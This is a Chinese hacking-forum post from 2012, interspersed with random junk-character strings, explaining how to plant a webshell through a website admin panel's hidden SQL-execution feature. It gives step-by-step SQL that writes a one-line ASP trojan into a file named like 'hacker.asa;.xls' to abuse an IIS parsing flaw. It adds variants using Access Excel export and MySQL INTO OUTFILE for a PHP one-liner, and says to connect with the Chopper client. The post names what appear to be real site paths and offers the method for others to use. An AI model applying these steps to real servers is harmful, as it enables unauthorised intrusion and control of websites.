好不容易进了后台,发现啥上传啊。备份啊多木有。0 l* q- W* B0 |! _2 }& t' r
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的 N$ Q' w4 j% A; d
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
, ]- U2 A5 Q. S0 z2 P7 S然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
: t& _' O" Y: i$ p6 o3 x1.create table cmd (a varchar(50))
) [" q8 p: o0 J' v# E' b% ^7 Q9 L2.insert into cmd (a) values (‘‘)) ]) e% s% U4 p9 q8 h
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd1 I+ u, T$ \; k' L v: D4 ^# C: Q8 w
(把表cmd的内容导出为物理路径的一个EXCEL文件)
) p3 G9 g- d q8 D4.drop table cmd
9 J7 J9 i2 x U+ Y利用IIS的BUG成功拿到了WEBSHELL。; V( w) R# g0 ]$ J. t7 U4 w G$ B8 ^, x
/ _+ R5 W; x: n直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话8 \1 | Y! K" {8 }5 c* J
3 [+ M/ s9 C ~/ w/ t) E; t7 e: b SQL语句意思解释:
' \3 j% d3 R7 z3 ?8 b 第一句/ {) Q; q ?% L0 t; P; O! ~
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50/ B2 Y3 {* E0 j6 ?: {* E! n
2 Y; n4 ~6 ?9 H- V7 F R 第二句
2 h, W7 t0 \& J$ t2 B2 e, a 在表cmd的a字段插入一句话木马
8 u. t/ v8 u3 S: b7 h1 O" Z$ _: ? 第三句
* l* M5 O4 E5 q! o% y/ p+ h 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
# [8 l" w: `0 z) Y1 m9 l* J
+ n2 [# F. M* _1 Z0 U 第四句
; N% O' i" ^/ E: f" I& L. L( ` 删除建立的cmd表
! F4 }) @* F5 Q: d% t- p& y. z
6 ~1 P6 }! ?7 B3 k 以下内容为测试:
' Y9 W' a; ]* @, v/ J' M3 x" j Access利用后台SQL执行命令功能导出WebShell:
9 J. n% i5 X( i8 k 这个更简单:
2 W, u$ t' D$ F6 @7 _- I$ J" z [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
5 u6 X+ C; I1 L) s8 p( M+ G 或者9 A! R) v2 ^! t
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]8 A! F( h. q8 e
% ~8 k0 C' ^, ]& U! I5 Y' f 后台有执行SQL语句功能(vote为已知表段)2 {' z8 ]1 K" c1 |! X8 a
希望对大家有所帮助拿shell的又一个思路
' b$ \& ?! T! Q( V {3 D |
发表于 2012-9-13 17:53:58
收藏
支持
反对